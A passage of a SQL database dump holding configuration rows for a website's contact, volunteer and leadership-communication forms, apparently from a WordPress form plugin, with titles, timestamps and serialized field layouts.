17:57:08'),(629,23,'clear_complete','1','clear_complete','1'),(630,23,'hide_complete','1','hide_complete','1'),(631,23,'show_title','0','show_title','0'),(632,23,'status','','status',''),(633,23,'append_page','','append_page',''),(634,23,'ajax','0','ajax','0'),(635,23,'logged_in','0','logged_in','0'),(636,23,'not_logged_in_msg','','not_logged_in_msg',''),(637,23,'sub_limit_number','','sub_limit_number',''),(638,23,'sub_limit_msg','','sub_limit_msg',''),(639,23,'title','Southwest Mountain Area Initiators and ESA\'s','title','Southwest Mountain Area Initiators and ESA\'s'),(640,23,'conditions','a:0:{}','conditions','a:0:{}'),(641,23,'default_label_pos','above','default_label_pos','above'),(642,23,'wrapper_class','','wrapper_class',''),(643,23,'element_class','','element_class',''),(644,23,'key','','key',''),(645,23,'add_submit','1','add_submit','1'),(646,23,'currency','','currency',''),(647,23,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(648,23,'calculations','a:0:{}','calculations','a:0:{}'),(649,23,'formContentData','a:10:{i:0;s:8:\"html_189\";i:1;s:11:\"textbox_190\";i:2;s:12:\"lastname_191\";i:3;s:9:\"email_192\";i:4;s:9:\"phone_193\";i:5;s:14:\"listselect_194\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166940171\";i:7;s:12:\"textarea_198\";i:8;s:18:\"html_1663800713464\";i:9;s:10:\"submit_200\";}','formContentData','a:10:{i:0;s:8:\"html_189\";i:1;s:11:\"textbox_190\";i:2;s:12:\"lastname_191\";i:3;s:9:\"email_192\";i:4;s:9:\"phone_193\";i:5;s:14:\"listselect_194\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166940171\";i:7;s:12:\"textarea_198\";i:8;s:18:\"html_1663800713464\";i:9;s:10:\"submit_200\";}'),(650,24,'objectType','Form Setting','objectType','Form Setting'),(651,24,'editActive','','editActive',''),(652,24,'date_updated','2016-04-07 02:14:32','date_updated','2016-04-07 02:14:32'),(653,24,'clear_complete','1','clear_complete','1'),(654,24,'hide_complete','1','hide_complete','1'),(655,24,'show_title','0','show_title','0'),(656,24,'status','','status',''),(657,24,'append_page','','append_page',''),(658,24,'ajax','0','ajax','0'),(659,24,'logged_in','0','logged_in','0'),(660,24,'not_logged_in_msg','','not_logged_in_msg',''),(661,24,'sub_limit_number','','sub_limit_number',''),(662,24,'sub_limit_msg','','sub_limit_msg',''),(663,24,'last_sub','3','last_sub','3'),(664,24,'title','Volunteer for ECK','title','Volunteer for ECK'),(665,24,'conditions','a:0:{}','conditions','a:0:{}'),(666,24,'default_label_pos','above','default_label_pos','above'),(667,24,'wrapper_class','','wrapper_class',''),(668,24,'element_class','','element_class',''),(669,24,'key','','key',''),(670,24,'add_submit','1','add_submit','1'),(671,24,'currency','','currency',''),(672,24,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(673,24,'calculations','a:0:{}','calculations','a:0:{}'),(674,24,'formContentData','a:18:{i:0;s:8:\"html_220\";i:1;s:11:\"textbox_221\";i:2;s:12:\"lastname_222\";i:3;s:9:\"email_223\";i:4;s:9:\"phone_224\";i:5;s:14:\"listselect_225\";i:6;s:6:\"hr_226\";i:7;s:8:\"html_227\";i:8;s:19:\"listmultiselect_228\";i:9;s:19:\"listmultiselect_232\";i:10;s:19:\"listmultiselect_236\";i:11;s:19:\"listmultiselect_237\";i:12;s:19:\"listmultiselect_234\";i:13;s:19:\"listmultiselect_235\";i:14;s:19:\"listmultiselect_233\";i:15;s:12:\"textarea_229\";i:16;s:18:\"html_1663800740469\";i:17;s:10:\"submit_231\";}','formContentData','a:18:{i:0;s:8:\"html_220\";i:1;s:11:\"textbox_221\";i:2;s:12:\"lastname_222\";i:3;s:9:\"email_223\";i:4;s:9:\"phone_224\";i:5;s:14:\"listselect_225\";i:6;s:6:\"hr_226\";i:7;s:8:\"html_227\";i:8;s:19:\"listmultiselect_228\";i:9;s:19:\"listmultiselect_232\";i:10;s:19:\"listmultiselect_236\";i:11;s:19:\"listmultiselect_237\";i:12;s:19:\"listmultiselect_234\";i:13;s:19:\"listmultiselect_235\";i:14;s:19:\"listmultiselect_233\";i:15;s:12:\"textarea_229\";i:16;s:18:\"html_1663800740469\";i:17;s:10:\"submit_231\";}'),(675,24,'_seq_num','4','_seq_num','4'),(676,25,'date_updated','2016-03-18 03:20:21','date_updated','2016-03-18 03:20:21'),(677,25,'clear_complete','1','clear_complete','1'),(678,25,'hide_complete','1','hide_complete','1'),(679,25,'show_title','0','show_title','0'),(680,25,'status','','status',''),(681,25,'append_page','','append_page',''),(682,25,'ajax','0','ajax','0'),(683,25,'logged_in','0','logged_in','0'),(684,25,'not_logged_in_msg','','not_logged_in_msg',''),(685,25,'sub_limit_number','','sub_limit_number',''),(686,25,'sub_limit_msg','','sub_limit_msg',''),(687,25,'last_sub','2','last_sub','2'),(688,25,'title','Webmaster Contact Form','title','Webmaster Contact Form'),(689,25,'_seq_num','3','_seq_num','3'),(690,25,'conditions','a:0:{}','conditions','a:0:{}'),(799,30,'title','Western Slope Leadership Communication','title','Western Slope Leadership Communication'),(800,30,'created_at','2018-01-03 12:07:41','created_at','2018-01-03 12:07:41'),(801,30,'form_title','','form_title',''),(802,30,'default_label_pos','above','default_label_pos','above'),(803,30,'show_title','0','show_title','0'),(804,30,'clear_complete','1','clear_complete','1'),(805,30,'hide_complete','1','hide_complete','1'),(806,30,'logged_in','0','logged_in','0'),(807,30,'seq_num','','seq_num',''),(808,30,'date_updated','2017-07-04 18:23:18','date_updated','2017-07-04 18:23:18'),(809,30,'status','','status',''),(810,30,'append_page','','append_page',''),(811,30,'ajax','0','ajax','0'),(812,30,'not_logged_in_msg','','not_logged_in_msg',''),(813,30,'sub_limit_number','','sub_limit_number',''),(814,30,'sub_limit_msg','','sub_limit_msg',''),(815,30,'last_sub','2','last_sub','2'),(816,30,'_seq_num','3','_seq_num','3'),(817,30,'conditions','a:0:{}','conditions','a:0:{}'),(818,30,'objectType','Form Setting','objectType','Form Setting'),(819,30,'editActive','','editActive',''),(820,30,'wrapper_class','','wrapper_class',''),(821,30,'element_class','','element_class',''),(822,30,'add_submit','1','add_submit','1'),(823,30,'currency','','currency',''),(824,30,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(825,30,'calculations','a:0:{}','calculations','a:0:{}'),(826,30,'formContentData','a:12:{i:0;s:7:\"html_56\";i:1;s:10:\"textbox_57\";i:2;s:11:\"lastname_58\";i:3;s:8:\"email_59\";i:4;s:8:\"phone_60\";i:5;s:13:\"listselect_61\";i:6;s:5:\"hr_62\";i:7;s:7:\"html_63\";i:8;s:13:\"listselect_64\";i:9;s:11:\"textarea_65\";i:10;s:12:\"recaptcha_66\";i:11;s:9:\"submit_67\";}','formContentData','a:12:{i:0;s:7:\"html_56\";i:1;s:10:\"textbox_57\";i:2;s:11:\"lastname_58\";i:3;s:8:\"email_59\";i:4;s:8:\"phone_60\";i:5;s:13:\"listselect_61\";i:6;s:5:\"hr_62\";i:7;s:7:\"html_63\";i:8;s:13:\"listselect_64\";i:9;s:11:\"textarea_65\";i:10;s:12:\"recaptcha_66\";i:11;s:9:\"submit_67\";}'),(854,2,'created_at','2019-07-15 14:03:44','created_at','2019-07-15 14:03:44'),(855,2,'seq_num',NULL,'seq_num',NULL),(856,2,'allow_public_link','0','allow_public_link','0'),(857,2,'embed_form','','embed_form',''),(858,2,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(859,2,'changeDateErrorMsg','','changeDateErrorMsg',''),(860,2,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(861,2,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(862,2,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(863,2,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(864,2,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(865,2,'validateRequiredField','','validateRequiredField',''),(866,2,'honeypotHoneypotError','','honeypotHoneypotError',''),(867,2,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(868,2,'drawerDisabled','','drawerDisabled',''),(869,4,'created_at','2019-07-15 14:04:26','created_at','2019-07-15 14:04:26'),(870,4,'default_label_pos','above','default_label_pos','above'),(871,4,'seq_num',NULL,'seq_num',NULL),(872,4,'objectType','Form Setting','objectType','Form Setting'),(873,4,'editActive','1','editActive','1'),(874,4,'allow_public_link','0','allow_public_link','0'),(875,4,'embed_form','','embed_form',''),(876,4,'wrapper_class','','wrapper_class',''),(877,4,'element_class','','element_class',''),(878,4,'key','','key',''),(879,4,'add_submit','1','add_submit','1'),(880,4,'currency','','currency',''),(881,4,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(882,4,'calculations','a:0:{}','calculations','a:0:{}'),(883,4,'formContentData','a:13:{i:0;s:8:\"html_201\";i:1;s:11:\"textbox_202\";i:2;s:12:\"lastname_203\";i:3;s:9:\"phone_205\";i:4;s:9:\"email_204\";i:5;s:58:\"street_address_add_or_update_mailing_address_1616603898544\";i:6;s:8:\"city_216\";i:7;s:14:\"listselect_218\";i:8;s:15:\"listcountry_219\";i:9;s:6:\"hr_207\";i:10;s:12:\"textarea_210\";i:11;s:18:\"html_1663797502959\";i:12;s:10:\"submit_212\";}','formContentData','a:13:{i:0;s:8:\"html_201\";i:1;s:11:\"textbox_202\";i:2;s:12:\"lastname_203\";i:3;s:9:\"phone_205\";i:4;s:9:\"email_204\";i:5;s:58:\"street_address_add_or_update_mailing_address_1616603898544\";i:6;s:8:\"city_216\";i:7;s:14:\"listselect_218\";i:8;s:15:\"listcountry_219\";i:9;s:6:\"hr_207\";i:10;s:12:\"textarea_210\";i:11;s:18:\"html_1663797502959\";i:12;s:10:\"submit_212\";}'),(884,5,'created_at','2019-07-15 14:04:34','created_at','2019-07-15 14:04:34'),(885,5,'seq_num',NULL,'seq_num',NULL),(886,5,'allow_public_link','0','allow_public_link','0'),(887,5,'embed_form','','embed_form',''),(888,6,'created_at','2019-07-15 14:04:43','created_at','2019-07-15 14:04:43'),(889,6,'seq_num',NULL,'seq_num',NULL),(890,6,'allow_public_link','0','allow_public_link','0'),(891,6,'embed_form','','embed_form',''),(892,8,'created_at','2019-07-15 14:05:01','created_at','2019-07-15 14:05:01'),(893,8,'seq_num',NULL,'seq_num',NULL),(894,8,'allow_public_link','0','allow_public_link','0'),(895,8,'embed_form','','embed_form',''),(896,9,'created_at','2019-07-15 14:05:10','created_at','2019-07-15 14:05:10'),(897,9,'seq_num',NULL,'seq_num',NULL),(898,9,'allow_public_link','0','allow_public_link','0'),(899,9,'embed_form','','embed_form',''),(900,10,'created_at','2019-07-15 14:05:20','created_at','2019-07-15 14:05:20'),(901,10,'seq_num',NULL,'seq_num',NULL),(902,10,'allow_public_link','0','allow_public_link','0'),(903,10,'embed_form','','embed_form',''),(904,11,'created_at','2019-07-15 14:05:30','created_at','2019-07-15 14:05:30'),(905,11,'seq_num',NULL,'seq_num',NULL),(906,11,'allow_public_link','0','allow_public_link','0'),(907,11,'embed_form','','embed_form',''),(908,12,'created_at','2019-07-15 14:05:38','created_at','2019-07-15 14:05:38'),(909,12,'seq_num',NULL,'seq_num',NULL),(910,12,'allow_public_link','0','allow_public_link','0'),(911,12,'embed_form','','embed_form',''),(912,12,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(913,12,'changeDateErrorMsg','','changeDateErrorMsg',''),(914,12,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(915,12,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(916,12,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(917,12,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(918,12,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(919,12,'validateRequiredField','','validateRequiredField',''),(920,12,'honeypotHoneypotError','','honeypotHoneypotError',''),(921,12,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(922,12,'drawerDisabled','','drawerDisabled',''),(923,13,'created_at','2019-07-15 14:05:48','created_at','2019-07-15 14:05:48'),(924,13,'default_label_pos','above','default_label_pos','above'),(925,13,'seq_num',NULL,'seq_num',NULL),(926,13,'objectType','Form Setting','objectType','Form Setting'),(927,13,'editActive','','editActive',''),(928,13,'allow_public_link','0','allow_public_link','0'),(929,13,'embed_form','','embed_form',''),(930,13,'wrapper_class','','wrapper_class',''),(931,13,'element_class','','element_class',''),(932,13,'key','','key',''),(933,13,'add_submit','1','add_submit','1'),(934,13,'currency','','currency',''),(935,13,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(936,13,'calculations','a:0:{}','calculations','a:0:{}'),(937,13,'formContentData','a:10:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:18:\"html_1663798083380\";i:9;s:10:\"submit_278\";}','formContentData','a:10:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:18:\"html_1663798083380\";i:9;s:10:\"submit_278\";}'),(938,14,'seq_num',NULL,'seq_num',NULL),(939,14,'allow_public_link','0','allow_public_link','0'),(940,14,'embed_form','','embed_form',''),(941,15,'created_at','2019-07-15 14:06:12','created_at','2019-07-15 14:06:12'),(942,15,'seq_num',NULL,'seq_num',NULL),(943,15,'allow_public_link','0','allow_public_link','0'),(944,15,'embed_form','','embed_form',''),(945,15,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(946,15,'changeDateErrorMsg','','changeDateErrorMsg',''),(947,15,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(948,15,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(949,15,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(950,15,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(951,15,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(952,15,'validateRequiredField','','validateRequiredField',''),(953,15,'honeypotHoneypotError','','honeypotHoneypotError',''),(954,15,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(955,15,'drawerDisabled','','drawerDisabled',''),(956,16,'created_at','2019-07-15 14:06:21','created_at','2019-07-15 14:06:21'),(957,16,'seq_num',NULL,'seq_num',NULL),(958,16,'allow_public_link','0','allow_public_link','0'),(959,16,'embed_form','','embed_form',''),(960,16,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(961,16,'changeDateErrorMsg','','changeDateErrorMsg',''),(962,16,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(963,16,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(964,16,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(965,16,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(966,16,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(967,16,'validateRequiredField','','validateRequiredField',''),(968,16,'honeypotHoneypotError','','honeypotHoneypotError',''),(969,16,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(970,16,'drawerDisabled','','drawerDisabled',''),(971,17,'created_at','2019-07-15 14:06:36','created_at','2019-07-15 14:06:36'),(972,17,'seq_num',NULL,'seq_num',NULL),(973,17,'allow_public_link','0','allow_public_link','0'),(974,17,'embed_form','','embed_form',''),(975,18,'created_at','2019-07-15 14:06:45','created_at','2019-07-15 14:06:45'),(976,18,'seq_num',NULL,'seq_num',NULL),(977,18,'allow_public_link','0','allow_public_link','0'),(978,18,'embed_form','','embed_form',''),(979,19,'created_at','2019-07-15 14:06:58','created_at','2019-07-15 14:06:58'),(980,19,'seq_num',NULL,'seq_num',NULL),(981,19,'allow_public_link','0','allow_public_link','0'),(982,19,'embed_form','','embed_form',''),(983,19,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(984,19,'changeDateErrorMsg','','changeDateErrorMsg',''),(985,19,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(986,19,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(987,19,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(988,19,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(989,19,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(990,19,'validateRequiredField','','validateRequiredField',''),(991,19,'honeypotHoneypotError','','honeypotHoneypotError',''),(992,19,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(993,19,'drawerDisabled','','drawerDisabled',''),(994,20,'created_at','2019-07-15 14:07:08','created_at','2019-07-15 14:07:08'),(995,20,'seq_num',NULL,'seq_num',NULL),(996,20,'allow_public_link','0','allow_public_link','0'),(997,20,'embed_form','','embed_form',''),(998,20,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(999,20,'changeDateErrorMsg','','changeDateErrorMsg',''),(1000,20,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1001,20,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1002,20,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1003,20,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1004,20,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1005,20,'validateRequiredField','','validateRequiredField',''),(1006,20,'honeypotHoneypotError','','honeypotHoneypotError',''),(1007,20,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1008,20,'drawerDisabled','','drawerDisabled',''),(1009,21,'created_at','2019-07-15 14:07:18','created_at','2019-07-15 14:07:18'),(1010,21,'seq_num',NULL,'seq_num',NULL),(1011,21,'allow_public_link','0','allow_public_link','0'),(1012,21,'embed_form','','embed_form',''),(1013,22,'created_at','2019-07-15 14:07:28','created_at','2019-07-15 14:07:28'),(1014,22,'seq_num',NULL,'seq_num',NULL),(1015,22,'allow_public_link','0','allow_public_link','0'),(1016,22,'embed_form','','embed_form',''),(1017,22,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1018,22,'changeDateErrorMsg','','changeDateErrorMsg',''),(1019,22,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1020,22,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1021,22,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1022,22,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1023,22,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1024,22,'validateRequiredField','','validateRequiredField',''),(1025,22,'honeypotHoneypotError','','honeypotHoneypotError',''),(1026,22,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1027,22,'drawerDisabled','','drawerDisabled',''),(1028,23,'created_at','2019-07-15 14:07:37','created_at','2019-07-15 14:07:37'),(1029,23,'seq_num',NULL,'seq_num',NULL),(1030,23,'allow_public_link','0','allow_public_link','0'),(1031,23,'embed_form','','embed_form',''),(1032,23,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1033,23,'changeDateErrorMsg','','changeDateErrorMsg',''),(1034,23,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1035,23,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1036,23,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1037,23,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1038,23,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1039,23,'validateRequiredField','','validateRequiredField',''),(1040,23,'honeypotHoneypotError','','honeypotHoneypotError',''),(1041,23,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1042,23,'drawerDisabled','','drawerDisabled',''),(1043,24,'created_at','2019-07-15 14:07:54','created_at','2019-07-15 14:07:54'),(1044,24,'seq_num',NULL,'seq_num',NULL),(1045,24,'allow_public_link','0','allow_public_link','0'),(1046,24,'embed_form','','embed_form',''),(1047,25,'created_at','2019-07-15 14:08:05','created_at','2019-07-15 14:08:05'),(1048,25,'default_label_pos','above','default_label_pos','above'),(1049,25,'seq_num',NULL,'seq_num',NULL),(1050,25,'objectType','Form Setting','objectType','Form Setting'),(1051,25,'editActive','','editActive',''),(1052,25,'allow_public_link','0','allow_public_link','0'),(1053,25,'embed_form','','embed_form',''),(1054,25,'wrapper_class','','wrapper_class',''),(1055,25,'element_class','','element_class',''),(1056,25,'key','','key',''),(1057,25,'add_submit','1','add_submit','1'),(1058,25,'currency','','currency',''),(1059,25,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1060,25,'calculations','a:0:{}','calculations','a:0:{}'),(1061,25,'formContentData','a:10:{i:0;s:8:\"html_321\";i:1;s:11:\"textbox_322\";i:2;s:12:\"lastname_323\";i:3;s:9:\"email_324\";i:4;s:6:\"hr_325\";i:5;s:11:\"textbox_326\";i:6;s:12:\"textarea_327\";i:7;s:8:\"html_328\";i:8;s:18:\"html_1663800773041\";i:9;s:10:\"submit_330\";}','formContentData','a:10:{i:0;s:8:\"html_321\";i:1;s:11:\"textbox_322\";i:2;s:12:\"lastname_323\";i:3;s:9:\"email_324\";i:4;s:6:\"hr_325\";i:5;s:11:\"textbox_326\";i:6;s:12:\"textarea_327\";i:7;s:8:\"html_328\";i:8;s:18:\"html_1663800773041\";i:9;s:10:\"submit_330\";}'),(1062,14,'changeDateErrorMsg','','changeDateErrorMsg',''),(1063,5,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1064,5,'changeDateErrorMsg','','changeDateErrorMsg',''),(1065,5,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1066,5,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1067,5,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1068,5,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1069,5,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1070,5,'validateRequiredField','','validateRequiredField',''),(1071,5,'honeypotHoneypotError','','honeypotHoneypotError',''),(1072,5,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1073,5,'drawerDisabled','','drawerDisabled',''),(1074,32,'objectType','Form Setting','objectType','Form Setting'),(1075,32,'editActive','1','editActive','1'),(1076,32,'date_updated','2017-07-04 16:58:32','date_updated','2017-07-04 16:58:32'),(1077,32,'clear_complete','1','clear_complete','1'),(1078,32,'hide_complete','1','hide_complete','1'),(1079,32,'show_title','0','show_title','0'),(1080,32,'status','','status',''),(1081,32,'append_page','','append_page',''),(1082,32,'ajax','0','ajax','0'),(1083,32,'logged_in','0','logged_in','0'),(1084,32,'not_logged_in_msg','','not_logged_in_msg',''),(1085,32,'sub_limit_number','','sub_limit_number',''),(1086,32,'sub_limit_msg','','sub_limit_msg',''),(1087,32,'last_sub','1','last_sub','1'),(1088,32,'title','Boulder Area Initiator and ESA\'s',NULL,NULL),(1089,32,'conditions','a:0:{}','conditions','a:0:{}'),(1090,32,'default_label_pos','above','default_label_pos','above'),(1091,32,'wrapper_class','','wrapper_class',''),(1092,32,'element_class','','element_class',''),(1093,32,'key','','key',''),(1094,32,'add_submit','1','add_submit','1'),(1095,32,'currency','','currency',''),(1096,32,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1097,32,'calculations','a:0:{}','calculations','a:0:{}'),(1098,32,'formContentData','a:11:{i:0;s:7:\"html_93\";i:1;s:10:\"textbox_94\";i:2;s:11:\"lastname_95\";i:3;s:8:\"email_96\";i:4;s:8:\"phone_97\";i:5;s:13:\"listselect_98\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166297230\";i:7;s:12:\"textarea_102\";i:8;s:18:\"html_1663797718830\";i:9;s:10:\"submit_104\";i:10;s:18:\"html_1663797717432\";}','formContentData','a:11:{i:0;s:7:\"html_93\";i:1;s:10:\"textbox_94\";i:2;s:11:\"lastname_95\";i:3;s:8:\"email_96\";i:4;s:8:\"phone_97\";i:5;s:13:\"listselect_98\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166297230\";i:7;s:12:\"textarea_102\";i:8;s:18:\"html_1663797718830\";i:9;s:10:\"submit_104\";i:10;s:18:\"html_1663797717432\";}'),(1099,32,'created_at','2019-08-07 20:08:36','created_at','2019-08-07 20:08:36'),(1100,32,'seq_num',NULL,'seq_num',NULL),(1101,32,'allow_public_link','0','allow_public_link','0'),(1102,32,'embed_form','','embed_form',''),(1103,32,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1104,32,'changeDateErrorMsg','','changeDateErrorMsg',''),(1105,32,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1106,32,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1107,32,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1108,32,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1109,32,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1110,32,'validateRequiredField','','validateRequiredField',''),(1111,32,'honeypotHoneypotError','','honeypotHoneypotError',''),(1112,32,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1113,32,'drawerDisabled','','drawerDisabled',''),(1114,33,'title','Contact Me','title','Contact Me'),(1115,33,'key','','key',''),(1116,33,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(1117,33,'default_label_pos','above','default_label_pos','above'),(1118,33,'conditions','a:0:{}','conditions','a:0:{}'),(1119,33,'objectType','Form Setting','objectType','Form Setting'),(1120,33,'editActive','','editActive',''),(1121,33,'show_title','1','show_title','1'),(1122,33,'clear_complete','1','clear_complete','1'),(1123,33,'hide_complete','1','hide_complete','1'),(1124,33,'wrapper_class','','wrapper_class',''),(1125,33,'element_class','','element_class',''),(1126,33,'add_submit','1','add_submit','1'),(1127,33,'logged_in','','logged_in',''),(1128,33,'not_logged_in_msg','','not_logged_in_msg',''),(1129,33,'sub_limit_number','','sub_limit_number',''),(1130,33,'sub_limit_msg','','sub_limit_msg',''),(1131,33,'calculations','a:0:{}','calculations','a:0:{}'),(1132,33,'formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}','formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}'),(1133,33,'container_styles_background-color','','container_styles_background-color',''),(1134,33,'container_styles_border','','container_styles_border',''),(1135,33,'container_styles_border-style','','container_styles_border-style',''),(1136,33,'container_styles_border-color','','container_styles_border-color',''),(1137,33,'container_styles_color','','container_styles_color',''),(1138,33,'container_styles_height','','container_styles_height',''),(1139,33,'container_styles_width','','container_styles_width',''),(1140,33,'container_styles_font-size','','container_styles_font-size',''),(1141,33,'container_styles_margin','','container_styles_margin',''),(1142,33,'container_styles_padding','','container_styles_padding',''),(1143,33,'container_styles_display','','container_styles_display',''),(1144,33,'container_styles_float','','container_styles_float',''),(1145,33,'container_styles_show_advanced_css','0','container_styles_show_advanced_css','0'),(1146,33,'container_styles_advanced','','container_styles_advanced',''),(1147,33,'title_styles_background-color','','title_styles_background-color',''),(1148,33,'title_styles_border','','title_styles_border',''),(1149,33,'title_styles_border-style','','title_styles_border-style',''),(1150,33,'title_styles_border-color','','title_styles_border-color',''),(1151,33,'title_styles_color','','title_styles_color',''),(1152,33,'title_styles_height','','title_styles_height',''),(1153,33,'title_styles_width','','title_styles_width',''),(1154,33,'title_styles_font-size','','title_styles_font-size',''),(1155,33,'title_styles_margin','','title_styles_margin',''),(1156,33,'title_styles_padding','','title_styles_padding',''),(1157,33,'title_styles_display','','title_styles_display',''),(1158,33,'title_styles_float','','title_styles_float',''),(1159,33,'title_styles_show_advanced_css','0','title_styles_show_advanced_css','0'),(1160,33,'title_styles_advanced','','title_styles_advanced',''),(1161,33,'row_styles_background-color','','row_styles_background-color',''),(1162,33,'row_styles_border','','row_styles_border',''),(1163,33,'row_styles_border-style','','row_styles_border-style',''),(1164,33,'row_styles_border-color','','row_styles_border-color',''),(1165,33,'row_styles_color','','row_style